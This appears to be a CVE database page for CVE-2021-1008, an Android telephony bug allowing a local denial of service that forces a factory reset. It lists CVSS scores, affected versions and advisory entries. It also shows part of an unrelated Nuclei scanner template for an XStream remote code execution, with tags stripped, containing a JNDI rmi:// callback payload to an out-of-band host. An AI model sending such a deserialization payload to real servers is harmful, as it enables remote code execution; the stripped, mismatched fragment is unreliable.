CVE-2021-1008
published 2021-12-15CVE-2021-1008: In addSubInfo of SubscriptionController.java, there is a possible way to force the user to make a factory reset due to a logic error in the code. This could…
PriorityP414medium4.4CVSS 3.1
AVLACLPRHUINSUCNINAH
EPSS
0.11%
1.4th percentile
In addSubInfo of SubscriptionController.java, there is a possible way to force the user to make a factory reset due to a logic error in the code. This could lead to local denial of service with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-197327688
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| android | — | — | |
| android | — | — | |
| platform | frameworks_opt_telephony | >= 12:0 < 12:2021-12-01 | 12:2021-12-01 |
CVSS provenance
nvdv3.14.4MEDIUMCVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H
nvdv2.02.1LOWAV:L/AC:L/Au:N/C:N/I:N/A:P
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-96j7-8ppq-5hjv: In addSubInfo of SubscriptionController
ghsa_unreviewed·2021-12-16
CVE-2021-1008 [MEDIUM] GHSA-96j7-8ppq-5hjv: In addSubInfo of SubscriptionController
In addSubInfo of SubscriptionController.java, there is a possible way to force the user to make a factory reset due to a logic error in the code. This could lead to local denial of service with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-197327688
OSV
CVE-2021-1008: In addSubInfo of SubscriptionController
osv·2021-12-01
CVE-2021-1008 CVE-2021-1008: In addSubInfo of SubscriptionController
In addSubInfo of SubscriptionController.java, there is a possible way to force the user to make a factory reset due to a logic error in the code. This could lead to local denial of service with System execution privileges needed. User interaction is not needed for exploitation.
No detection rules found.
Nuclei
XStream <1.4.16 - Remote Code Execution
nuclei·CVSS 9.1
CVE-2021-21351 [MEDIUM] XStream <1.4.16 - Remote Code Execution
XStream
ysomap
-10086
false
false
false
false
false
1008
true
1000
0
2
0
0
0
true
1004
false
rmi://{{interactsh-url}}/test
com.sun.rowset.JdbcRowSetImpl
setAutoCommit
boolean
false
false
false
-1
false
false
1
1
false
ysomap
test
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: body
words:
- "timestamp"
- "com.thoughtworks.xstream"
condition: or
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 500
# digest: 4a0a0047304502204c4a8b66341a4076b23df776ca5d113607a36cbcd511f692edf2c2b37a48805a022100c4dfc0f9910ceb79ff4ef0f5e9f089d3b725b40fe3d29a7988216aec529085de:922c64590222798bb761d5b6d8e72950
No writeups or analysis indexed.
2021-12-15
Published